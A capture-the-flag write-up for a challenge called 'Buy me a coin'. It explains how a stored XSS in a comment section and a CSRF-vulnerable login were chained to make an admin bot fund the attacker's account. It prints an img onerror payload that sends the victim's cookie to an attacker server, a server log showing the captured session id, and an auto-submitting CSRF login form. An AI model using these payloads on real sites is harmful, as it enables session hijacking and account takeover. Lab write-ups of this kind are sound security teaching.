Buy me a coin
Points: Level 3/5
Buy me a coin
Your goal is to buy the coin that is being sold on the website, despite the fact that you’re broke. You know someone will eventually top up their wallet.
Get the coin to get your answer
You have to make the admin top up your account with money.
- You first exploit the comment section with
XSSto get the admin execute your code
- Notice the login system is vulnerable to
- Use the
XSSto force the admin to log in one of your accounts by using
CSRF, and wait for him/her to top up your account
We start by creating an account to do some testing on the service. Once we are logged in, we see that we can buy the token right away, the problem is, we ain’t got no money.
After some more testing, we realized that the deposit feature does not work. This leaves us with three thesis:
- We find a way to get some money in our account and buy a token
- We buy a token with no money
- We steal an account with some money to buy the token
<img src=# onerror=document.location="http://myserver/" + document.cookie>
And we got an answer!!!
126.96.36.199 - - [03/Mar/2019:19:51:02 +0000] "GET /PHPSESSID=oujsc3iqj01megj0k80httl935 HTTP/1.1" 404 152 "http://c3-f342e5d04f11-ctf.pixels.camp/wallet.php" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0.1337"
We now have the session id
oujsc3iqj01megj0k80httl935 that maybe will contain some money, or maybe the flag!!
Once we inject this new session id, we see that this belongs to the account
noob, and unfortunately this account does not have any token or any money. We also realized that this account is reading all the comments submitted by other accounts.
The challenge description has an interesting sentence:
You know someone will eventually top up their wallet. This made us believe that there is some mechanism that is topping up accounts automatically. All we need to do is to make this mechanism top up one of our accounts.
It turns out the login is vulnerable to a
CSRF attack. Maybe we could use our
XSS to force someone to log in one of our accounts and hopefully deposit some money on it. Let’s create the exploit x)
This piece of html is going to log one of our users automatically when you access it. We just need to put this in a remote server and call our
XSS payload again.
<html> <body> <form action="https://c3-f342e5d04f11-ctf.pixels.camp/wallet.php" method="POST"> <input type="hidden" name="username" value="adminn"/> <input type="hidden" name="password" value="adminnppp"/> <input type="submit"/> </form> </body> </html> <script>document.forms.submit();</script>
We send a new comment, pointing to our
CSRF exploit, and pray the someone will eventually top up a wallet, that in this case is going to be ours.
<img src=# onerror=document.location="http://myserver/csrf.html">
And Boom, our account has enough money to buy the token!!! After buying, we got the flag!